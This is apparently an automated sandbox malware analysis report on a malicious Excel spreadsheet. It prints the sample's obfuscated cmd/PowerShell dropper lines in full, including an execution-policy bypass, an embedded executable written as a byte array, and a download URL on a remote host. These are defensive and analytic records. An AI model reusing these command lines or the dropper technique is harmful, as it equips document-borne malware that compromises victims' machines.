Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policyShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c%sUG%Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 808000 Sample: 7362_8164_(2019.2).xls Startdate: 05/03/2019 Architecture: WINDOWS Score: 84 24 Multi AV Scanner detection for submitted file 2->24 26 Obfuscated command line found 2->26 28 Very long command line found 2->28 30 5 other signatures 2->30 8 EXCEL.EXE 74 25 2->8         started        process3 signatures4 32 Obfuscated command line found 8->32 34 Very long command line found 8->34 36 Document exploit detected (process start blacklist hit) 8->36 38 PowerShell case anomaly found 8->38 11 cmd.exe 8->11         started        process5 process6 13 cmd.exe 11->13         started        signatures7 40 Obfuscated command line found 13->40 42 PowerShell case anomaly found 13->42 16 powershell.exe 12 6 13->16         started        process8 dnsIp9 20 benistora.com 5.188.60.66, 443 unknown Russian Federation 16->20 22 Powershell connects to network 16->22 signatures10

Simulations

Behavior and APIs

TimeTypeDescription
17:15:26API Interceptor227x Sleep call for process: EXCEL.EXE modified
17:16:09API Interceptor1x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
7362_8164_(2019.2).xls46%virustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://benistora.com/uploads/audio.7zH0%Avira URL Cloudsafe
https://benistora.com/uploads/audio.7z3%virustotalBrowse
https://benistora.com/uploads/audio.7z0%Avira URL Cloudsafe
https://benistora.com2%virustotalBrowse
https://benistora.com0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthor
00000005.00000002.1636004810.01A69000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000005.00000002.1638447073.04EE0000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000005.00000002.1635995960.01A60000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000005.00000002.1634369984.00150000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000005.00000002.1634433896.00190000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000005.00000002.1634948704.011C0000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000005.00000002.1634387196.00160000.00000008.sdmpEmbedded_PEunknownunknown
00000005.00000002.1634303771.000D0000.00000008.sdmpEmbedded_PEunknownunknown
00000005.00000002.1638385697.04350000.00000004.sdmpEmbedded_PEunknownunknown
00000005.00000002.1638206829.03EE0000.00000008.sdmpEmbedded_PEunknownunknown
00000005.00000002.1635853654.01920000.00000002.sdmpEmbedded_PEunknownunknown
00000005.00000002.1634554312.00220000.00000008.sdmpEmbedded_PEunknownunknown
00000005.00000002.1636329423.01D34000.00000004.sdmpEmbedded_PEunknownunknown

Unpacked PEs

SourceRuleDescriptionAuthor
5.2.powershell.exe.4350000.5.unpackEmbedded_PEunknownunknown
5.2.powershell.exe.d0000.0.raw.unpackEmbedded_PEunknownunknown
5.2.powershell.exe.d0000.0.unpackEmbedded_PEunknownunknown
5.2.powershell.exe.4350000.5.raw.unpackEmbedded_PEunknownunknown
5.2.powershell.exe.220000.2.unpackEmbedded_PEunknownunknown
5.2.powershell.exe.160000.1.unpackEmbedded_PEunknownunknown
5.2.powershell.exe.160000.1.raw.unpackEmbedded_PEunknownunknown
5.2.powershell.exe.1920000.3.unpackEmbedded_PEunknownunknown
5.2.powershell.exe.1920000.3.raw.unpackEmbedded_PEunknownunknown
5.2.powershell.exe.220000.2.raw.unpackEmbedded_PEunknownunknown
5.2.powershell.exe.3ee0000.4.raw.unpackEmbedded_PEunknownunknown
5.2.powershell.exe.3ee0000.4.unpackEmbedded_PEunknownunknown

Joe Sandbox View / Context

IPs

No context

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
benistora.comhttp://file.tancyo.blog.shinobi.jp/ea9550da.xlsGet hashmaliciousBrowse
  • 5.188.60.66

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
unknownInvoice0186.pdfGet hashmaliciousBrowse
  • 192.168.0.40
P_2038402.xlsxGet hashmaliciousBrowse
  • 192.168.0.44
bad.pdfGet hashmaliciousBrowse
  • 192.168.0.44
RFQ.pdfGet hashmaliciousBrowse
  • 192.168.0.44
100323.pdfGet hashmaliciousBrowse
  • 192.168.0.44
Copy.pdfGet hashmaliciousBrowse
  • 127.0.0.1
2.exeGet hashmaliciousBrowse
  • 192.168.0.40
UPPB502981.docGet hashmaliciousBrowse
  • 192.168.0.44
Adm_Boleto.via2.comGet hashmaliciousBrowse
  • 192.168.0.40
00ECF4AD.exeGet hashmaliciousBrowse
  • 192.168.0.40
PDF_100987464500.exeGet hashmaliciousBrowse
  • 192.168.0.40
filedata.exeGet hashmaliciousBrowse
  • 192.168.0.40
.exeGet hashmaliciousBrowse
  • 192.168.1.60
33redacted@threatwave.comGet hashmaliciousBrowse
  • 192.168.1.71

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.